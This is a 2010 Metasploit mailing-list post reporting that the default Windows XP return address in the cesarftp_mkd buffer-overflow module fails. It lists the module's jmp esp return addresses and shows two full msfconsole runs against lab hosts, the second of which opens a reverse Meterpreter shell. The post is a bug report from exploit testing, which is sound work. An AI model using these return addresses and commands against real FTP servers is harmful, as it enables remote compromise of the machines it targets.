Metasploit mailing list archives
cesarftp_mkd default target XP SP2/SP3 doesn't work
From: One Time <onetime99 () ymail com>
Date: Mon, 22 Feb 2010 13:13:28 -0800 (PST)
In the cesarftp_mkd module default targets are:

[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ],
[ 'Windows 2000 Pro SP4 French', { 'Ret' => 0x775F29D0 } ],
[ 'Windows XP SP2/SP3 English', { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll
#[ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll
#[ 'Windows XP SP3 English', { 'Ret' => 0x76b43adc } ], # jmp esp, winmm.dll
[ 'Windows 2003 SP1 English', { 'Ret' => 0x76AA679b } ],

The exploit works only if I enable the commented out target:
"#[ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll"

---
The following is the result of a test run against Windows XP SP2 (English) with svn r8585 (2010.02.22) and target
[ 'Windows XP SP2/SP3 English', { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll:

msf > use exploit/windows/ftp/cesarftp_mkd
msf exploit(cesarftp_mkd) > set PAYLOAD windows/meterpreter/reverse_ord_tcp
PAYLOAD => windows/meterpreter/reverse_ord_tcp
msf exploit(cesarftp_mkd) > set TARGET 2
TARGET => 2
msf exploit(cesarftp_mkd) > set LHOST 192.168.159.131
LHOST => 192.168.159.131
msf exploit(cesarftp_mkd) > set RHOST 192.168.159.134
RHOST => 192.168.159.134
msf exploit(cesarftp_mkd) > exploit
[*] Started reverse handler on 192.168.159.131:4444
[*] Connecting to FTP server 192.168.159.134:21...
[*] Connected to target FTP server.
[*] Authenticating as anonymous with password mozilla () example com...
[*] Sending password...
[*] Trying target Windows XP SP2/SP3 English...
[*] Exploit completed, but no session was created.
msf exploit(cesarftp_mkd) >

--
The following is the result of a test run against Windows XP SP2 (English) with svn r8585 (2010.02.22) and target
[ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll:

msf > use exploit/windows/ftp/cesarftp_mkd
msf exploit(cesarftp_mkd) > set PAYLOAD windows/meterpreter/reverse_ord_tcp
PAYLOAD => windows/meterpreter/reverse_ord_tcp
msf exploit(cesarftp_mkd) > set TARGET 3
TARGET => 3
msf exploit(cesarftp_mkd) > set LHOST 192.168.159.131
LHOST => 192.168.159.131
msf exploit(cesarftp_mkd) > set RHOST 192.168.159.134
RHOST => 192.168.159.134
msf exploit(cesarftp_mkd) > exploit
[*] Started reverse handler on 192.168.159.131:4444
[*] Connecting to FTP server 192.168.159.134:21...
[*] Connected to target FTP server.
[*] Authenticating as anonymous with password mozilla () example com...
[*] Sending password...
[*] Trying target Windows XP SP2 English...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.159.131:4444 -> 192.168.159.134:1026)
meterpreter >

--
Regards.